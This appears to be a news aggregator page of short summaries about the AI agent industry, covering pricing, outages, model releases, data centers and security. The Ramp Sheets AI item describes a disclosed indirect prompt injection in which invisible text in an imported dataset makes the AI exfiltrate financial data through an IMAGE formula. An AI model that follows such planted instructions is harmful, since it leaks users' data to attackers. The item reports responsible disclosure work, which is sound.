News
The latest from the AI agent ecosystem, updated multiple times daily.
Ten custom subagents manage Metabase's 500K-line Clojure backend
Metabase engineer Bryan Maass built ten Claude Code subagents to manage their 500K-line Clojure backend. Each is a markdown file packed with domain expertise, from the query processor's 68-stage middleware pipeline to permissions caveats and database driver quirks. The result: less token burn and agents that start knowing what they need to know.
Claude Code's Runaway Safety Prompt Refuses Work and Burns Tokens
A regression bug in Claude Code v2.1.111 injects a malware analysis system reminder into every file read operation. Subagents running Opus 4.7 interpret the poorly phrased refusal directive as unconditional, refusing legitimate code edits 40-60% of the time and disrupting parallel agent workflows. Each reminder wastes roughly 400 tokens per file read. The issue was supposedly fixed in v2.1.92.
SOB Benchmark: 95% Valid JSON, 70% Correct Values
Interfaze has released SOB (Structured Output Benchmark), a new benchmark for evaluating LLMs' structured output capabilities across text, image, and audio modalities. Unlike existing benchmarks that only check schema compliance, SOB measures seven metrics including Value Accuracy, Faithfulness, and Perfect Response. Testing 21 models revealed that while most achieve 95%+ on JSON Pass, Value Accuracy is 15-30 points lower, showing a real gap between valid JSON and correct JSON in production systems.
Ramp's Sheets AI Could Silently Leak Your Financials
Security researchers at PromptArmor found a vulnerability in Ramp's Sheets AI that let attackers steal financial data through indirect prompt injection. An attacker hides malicious instructions in an external dataset using invisible text. When users import it and ask Ramp AI to compare with their financials, the AI inserts a malicious IMAGE formula that sends sensitive data to an attacker-controlled server. No user approval required. The issue was responsibly disclosed to Ramp in February 2026 and resolved in March 2026.
GitHub RCE: Patched in 2 Hours, But Should It Have Existed?
GitHub's security team details their response to CVE-2026-3854, a critical remote code execution vulnerability discovered by Wiz researchers. The flaw allowed users with push access to execute arbitrary commands on GitHub servers via crafted git push options that injected malicious fields into internal metadata. GitHub validated and patched the issue on github.com in under 2 hours, confirmed no exploitation occurred through telemetry analysis, and released security updates for GitHub Enterprise Server versions 3.14+.
OpenAI's Phone Gambit: The Ive Reversal, Chip Deals, 2028 Target
OpenAI is reportedly developing a smartphone with mass production scheduled for 2028, according to supply chain analyst Ming-Chi Kuo. MediaTek and Qualcomm are chip partners, and Luxshare Precision Industry is the exclusive manufacturer. Kuo argues smartphones are uniquely positioned for AI agent use due to their ability to capture a user's full real-time state including location, activity, and context. It's a reversal from OpenAI's earlier focus on non-phone form factors developed with Jony Ive.
Fake Keys Keep AI Agents From Leaking Real Secrets
Goutham Veeramachaneni built a credential injection proxy for Hermes Agent that swaps fake tokens for real ones, preventing AI agents from ever touching actual API keys. The implementation hit real friction with browser automation and Python libraries ignoring proxy settings, but tools like Agent Vault and Kloak are now standardizing the pattern.
Your Terminal Is Burning Battery Like It's Mining Bitcoin
GPU-accelerated terminals (Ghostty, Alacritty, Kitty) burn excessive battery running AI coding assistants like Claude Code. Ghostty hit 3,600 energy impact versus 125 for Brave. Recommendation: use Terminal.app or iTerm2 with GPU rendering off.
AI Huynya: Collecting AI's Dirty Laundry, Anonymously
A platform tracking AI failures, corporate leaks about companies replacing humans with AI, and industry layoffs. Features an anonymous submission system with no tracking or cookies.
Utah greenlights 9GW AI campus using over twice state electricity
Kevin O'Leary's O'Leary Digital received approval from Utah's Military Installation Development Authority (MIDA) to build 'Stratos,' a 9 GW hyperscale data center campus in Box Elder County. The off-grid facility, powered by natural gas from the Ruby Pipeline, will consume more than double the state's average electricity use. Phase 1 targets 3 GW capacity. The project received significant tax incentives including energy use tax reduced from 6% to 0.5% and 80% property tax rebates. No hyperscale tenants have been announced yet, though Amazon, Microsoft, Google, Meta, and Apple are noted as potential operators. O'Leary Digital has never built a data center, and industry watchers question whether the project can deliver on its ambitious targets.
Cybersec: more work, same pay, zero thanks
71% of cybersecurity professionals globally saw no salary increase in 2025. AI is expanding the threat surface and increasing the volume, speed, and complexity of attacks security teams must handle. Despite rising threats and high demand, security professionals rank in the bottom three for workplace satisfaction due to boardroom complacency and limited recognition.
Anthropic Auth Failure Takes Down All Claude Products for 78 Minutes
Anthropic experienced a 78-minute outage on April 28 affecting Claude.ai, Claude API, Console, Code, Cowork, and Government products. An authentication system failure blocked both human users and programmatic access from 17:34 to 18:52 UTC. Enterprise users have voiced frustration about reliability, citing multiple recent outages despite premium pricing.
Lenovo Now Controls Phoenix BIOS. Expect CFIUS Scrutiny.
Lenovo completed its acquisition of Phoenix Technologies' firmware business, putting BIOS development for millions of PCs under a Beijing-headquartered company. The deal covers Phoenix's intellectual property and expertise, raising immediate questions about CFIUS scrutiny and boot-level security at a time when Western governments are already restricting Chinese hardware on sensitive networks.
DOOM runs inside ChatGPT now
You can play DOOM inside ChatGPT now. Chris Nager built an MCP app that launches the game inline in compatible AI clients like ChatGPT and Claude, with a browser fallback for everything else.
Warp open-sources terminal, wants you bossing agents not writing code
Warp open-sourced its terminal client under AGPL v3. Instead of writing code, contributors supervise AI agents that handle implementation. OpenAI is founding sponsor, with GPT models powering workflows on Oz, Warp's cloud orchestration platform. Support for open-source models like Kimi, MiniMax, and Qwen is also included.
Anthropic Backs Blender's Python API in Play for 3D Market
Anthropic joined the Blender Development Fund as a Corporate Patron, funding core development including the Python API. The move gives Claude a potential inside track on 3D integration while OpenAI sits out the patron list.
Laguna XS.2 Goes Open Weight, Poolside Shares Where Qwen Beats It
Poolside has released two agentic coding models: Laguna M.1 (225B MoE with 23B active parameters) and Laguna XS.2 (33B MoE with 3B active parameters). XS.2 is their first open-weight release under Apache 2.0. Both models are designed for long-horizon coding work, achieving strong benchmarks on SWE-bench Pro (46.9% for M.1, 44.5% for XS.2) and Terminal-Bench 2.0 (40.7% for M.1, 30.1% for XS.2). The models are available via API and OpenRouter, with XS.2 weights downloadable for local deployment.
Laguna XS.2 Goes Open Source, Challenges Models 10x Its Size
Poolside releases Laguna M.1 (225B/23B activated) and open-weights XS.2 (33B/3B activated), both competitive on SWE-bench Pro despite low activation counts.
Utah greenlights 9GW AI campus using over twice state electricity
Utah's Military Installation Development Authority approved O'Leary Digital's 'Stratos' project, a 9 GW off-grid data center campus powered by natural gas that would consume more than double Utah's current electricity usage. The project aims to attract hyperscale cloud operators with significant tax incentives, though no tenants have been publicly named yet. O'Leary Digital has no track record building data centers.
GitHub Copilot Code Reviews Now Bill You Twice
Starting June 1, 2026, GitHub Copilot's agent-powered code review feature will begin consuming GitHub Actions minutes in addition to AI Credits for private repositories. The code review runs on GitHub Actions using GitHub-hosted runners as part of its agentic tool-calling architecture, allowing it to pull in broader repository context for more relevant feedback.
Anthropic Backs Blender Fund. AI 3D Control Just Got Easier.
Anthropic is now a Corporate Patron of the Blender Development Fund. The funding targets Blender's Python API, the toolset for building custom 3D workflows. That API is also how AI agents like Claude could programmatically control Blender.
AISLE Finds 38 CVEs in OpenEMR, Software Used by 100K Providers
AISLE, an AI analysis engine, found 38 CVE vulnerabilities in OpenEMR, an open-source electronic health record platform used by over 100,000 medical providers and 200 million patients. Several scored CVSS 10.0, the maximum severity. Vulnerabilities included SQL injection, cross-site scripting, path traversal, and authorization issues. AISLE generated fix proposals for each CVE and worked with OpenEMR maintainers to patch them. The partnership's now formalized with AISLE PRO integrated into OpenEMR's code review workflow.
GitHub Copilot Kills Flat Fees. The Subsidy Party Is Over.
Ed Zitron analyzes the fundamental unsustainability of AI subscription models, using GitHub Copilot's move to usage-based pricing as a case study. The article argues that AI companies have been heavily subsidizing compute costs—Microsoft reportedly lost $20-80 per Copilot user monthly while charging $10-19—and that companies deliberately obscured true costs to grow user bases before inevitably shifting to pricing that reflects actual inference expenses.
Anthropic Backs Blender, Bets on Python API for AI 3D Workflows
Anthropic joins the Blender Development Fund as a Corporate Patron, backing core development with a focus on the Python API that connects AI assistants to professional 3D software.
OpenAI Misses Revenue, User Targets as IPO Looms
The Wall Street Journal reports OpenAI fell short on revenue and user milestones it set for itself. For agent builders relying on its API, the IPO pressure and rising open-source competition could reshape what they build on.
Copilot's Pricing Shift Exposes AI's Broken Economics
GitHub Copilot's switch to usage-based pricing reveals years of subsidized compute, with Microsoft losing $20+ per user monthly. The 'subprime AI crisis' framing explains why flat-rate AI subscriptions fail: wildly varying token usage per user, and reasoning models that cost more to run over time.
One Git Push to Hack GitHub: AI Found This RCE First
Wiz Research discovered a critical Remote Code Execution vulnerability (CVE-2026-3854) in GitHub's internal git infrastructure affecting both GitHub.com and GitHub Enterprise Server. The flaw lets any authenticated user execute arbitrary commands on GitHub's backend servers with a single git push. This is one of the first critical vulnerabilities discovered in closed-source binaries using AI-augmented tooling, specifically automated reverse engineering using IDA MCP. GitHub mitigated the issue on GitHub.com within 6 hours and released patches for GHES, though 88% of instances remained vulnerable at the time of writing.
Anthropic quietly paywalls Opus for Claude Pro users
Anthropic's Claude Code documentation now states that Pro subscribers must enable and pay for extra usage to access Opus models, marking a shift away from flat-rate pricing for premium model tiers.
OpenAI Revenue Miss Triggers AI Infrastructure Selloff
OpenAI reportedly missed internal revenue and user growth projections, sending AI infrastructure stocks down 3-5%. The bigger story is the take-or-pay GPU contracts underneath. OpenAI locked in massive compute deals with providers like Oracle and CoreWeave, who then used those contracts as collateral to borrow billions. Growth slows, and that debt exposure ripples downstream.
Poolside open-sources Laguna XS.2, takes on Qwen in small agent models
Poolside AI releases Laguna XS.2, its first open-weight model under Apache 2.0, alongside the larger Laguna M.1. Both are Mixture-of-Experts coding models built for agentic tasks. XS.2 (33B total, 3B active) hits 44.5% on SWE-bench Pro, trailing Qwen3.6's 49.5% despite similar size. The release includes their Agent Client Protocol server and details training on 30T tokens with the Muon optimizer.
Zitron lost his AI bubble argument, so he's calling everyone frauds
Ed Zitron went from calling AI a bubble to accusing OpenAI and Anthropic of fraud. Kelsey Piper explains why that shift reveals more about his argument than his targets.
BookStack Ditches GitHub Over Microsoft's AI Push
BookStack, a self-hosted open source platform, has migrated from GitHub to Codeberg due to concerns about GitHub's direction under Microsoft. Key reasons include GitHub's shift to an 'AI-powered developer platform,' consumption of public code for AI services without opt-in, and UX changes prioritizing revenue over user experience. As of July 2024, secondary repos have been migrated to CodeBerg with GitHub originals archived.
Ed Zitron's AI Bubble Case Crumbles Under Evidence
Kelsey Piper takes aim at tech critic Ed Zitron's evolving case against AI, arguing his shift from reasonable economic skepticism in 2024 to fraud allegations in 2026 reveals a thesis that can't survive contact with reality. The piece is direct and opinionated, pointing to plunging costs and rising adoption as evidence the bubble narrative needs rethinking.
Google Drops AI Veto Power in Pentagon Deal
Google signed a classified deal with the Pentagon letting the government use its AI for 'any lawful government purpose' with no veto power. The contract mentions no domestic mass surveillance or autonomous weapons without human oversight, but Google can't enforce those limits. Google now joins OpenAI and xAI with classified Pentagon deals, while Anthropic was blacklisted for keeping its guardrails.
OpenAI misses revenue targets, AI stocks sell off
The Wall Street Journal reported that OpenAI missed internal projections for user growth and revenue, triggering declines for Oracle, Nvidia, Broadcom, AMD, and CoreWeave. The shortfall raises questions about OpenAI's ability to fund its massive compute commitments, which use take-or-pay contracts. OpenAI disputed the report. Analysts split on whether this signals a sector problem or just OpenAI losing ground to Anthropic and Google's Gemini.
$1.1B superlearner startup bets AI can learn without humans
Ineffable Intelligence, founded by former DeepMind researcher David Silver, raised $1.1 billion at a $5.1 billion valuation. The company aims to build a 'superlearner' that discovers knowledge through self-play, without human training data. Silver previously led reinforcement learning at DeepMind and built AlphaZero. Sequoia Capital and Lightspeed Venture Partners led the round, with participation from Index Ventures, Google, Nvidia, British Business Bank, and Sovereign AI.
Anthropic's Mythos SWE-bench Proof Has a Fatal Flaw
Matt Dupree found a fatal flaw in Anthropic's argument that Mythos's SWE-bench gains are genuine. A Python simulation shows how a cheating model could produce the same results under an imperfect memorization detector. Without quantifying the detector's error rate, Anthropic's evidence doesn't hold up.
Cursor Camp Isn't the AI Editor You're Looking For
A new Neal.fun project called Cursor Camp landed on Hacker News, briefly confusing AI developers who assumed it was related to Anysphere's popular Cursor code editor. The site couldn't be loaded, but Neal.fun's history of casual browser experiments suggests it's about mouse cursors, not LLMs.
PyWry Bakes MCP Server Into Python UIs That Run Everywhere
PyWry is a Python cross-platform UI framework targeting desktop, notebooks, and web from one codebase. Built on PyTauri's vendored 30.8MB Tauri runtime, it ships with MCP server integration for AI agent interaction, two-way Python-JS bridging, OAuth2, and support for AgGrid, Plotly, and TradingView. Hacker News commenters dispute the 'rendering engine' label, but the agent-ready approach fills a real gap.
The Social Edge of AI: Better Individually, Worse Together
Research shows AI makes writers more creative individually but their stories become more similar collectively. This tragedy of the commons extends to AI itself. LLM intelligence comes from human social complexity, and as companies automate away human discourse, they're undermining the foundation future models need. The evidence is already visible in declining human conversation online.
Gas-Powered AI Data Centers Could Out-Emit Entire Nations
A WIRED review of air permits for 11 natural gas-powered data center projects tied to OpenAI, Meta, Microsoft, and xAI reveals potential emissions topping 129 million tons of greenhouse gases per year. The permits expose a rush toward behind-the-meter power generation, where data centers skip the grid and build their own gas plants to fuel AI infrastructure directly.
Anthropic's safety problem isn't what it thinks
An opinion piece arguing Anthropic's safety focus is too narrow. While the company carefully restricts models like Mythos over cybersecurity concerns, product reliability, pricing stability, and clear communication get less attention. Trust erosion from product failures is a safety issue too.
Ant Group Open-Sources 3D Mapper, Won't Say What Hardware
LingBot-Map is a system for streaming 3D reconstruction that uses a geometric context transformer. It achieves approximately 20 FPS at 518x378 resolution, though the hardware requirements were not specified.
Shannon's 1950 Chess Paper Predicted AI's Flaws
The article draws parallels between Claude Shannon's 1950 chess programming paper and modern AI challenges, showing that approximation errors, confident hallucinations, and the dangerous gap between fluency and accuracy are problems Shannon identified over 70 years ago.
This React Library Turns Loading Spinners Into Arcade Games
react-waiting-game is a React library that provides one-button mini-arcade games to occupy users during long-running tasks like LLM responses. The library includes five games (Jellyfish Drift, Pixel Runner, Gravity Flip, Invaders, Rhythm Tap) with 1-bit pixel art, zero runtime dependencies, and features like high scores, achievements, and SSR support.
Gas-Powered AI Data Centers May Out-Emit Entire Countries
An investigation reveals that gas-powered data centers being built for AI companies including OpenAI, Meta, Microsoft, and xAI could emit over 129 million tons of greenhouse gases annually. Projects like xAI's Colossus campuses and Microsoft's Chevron-backed Texas facility use behind-the-meter generation, running turbines constantly unlike normal power plants. The pollution hits communities like South Memphis, where the NAACP has sued over turbines in a predominantly Black, low-income neighborhood.
Anthropic passes OpenAI at $1T and it's a feeding frenzy
Anthropic has reached a $1 trillion valuation on secondary markets, surpassing OpenAI's $880 billion. The surge is driven by revenue growth from Claude Code adoption and partnerships with Amazon and Palantir, with annualized run rate jumping from $9B to $39B. But scarce shares and prestige-chasing investors have turned ownership into a status symbol.
Claude Code and the Copyright Void
An analysis of copyright issues haunting AI-generated code, triggered by Anthropic's Claude Code leak. Code may lack copyright without meaningful human authorship, employers may claim it via work-for-hire clauses, and outputs resembling GPL-licensed training data can silently import copyleft obligations. Includes practical guidance on documentation and license scanning.
Lenovo-Phoenix Deal Leaves BIOS Market with Just Two Vendors
Lenovo completed its acquisition of Phoenix Technologies' firmware (BIOS) business, including intellectual property and the Dublin-based team. Financial terms weren't disclosed. The deal turns a 20-year vendor relationship into an internal capability, giving Lenovo direct control over firmware development for its PCs and AI-enabled devices.
Open CoDesign builds UI prototypes on your machine, not in the cloud
OpenCoworkAI released Open CoDesign, a free desktop app that generates UI designs, prototypes, and slides without sending your work to the cloud. The open-source tool supports OpenAI, Anthropic, Google, DeepSeek, or local models through Ollama. Users can click to edit specific parts of a design rather than regenerating everything from scratch.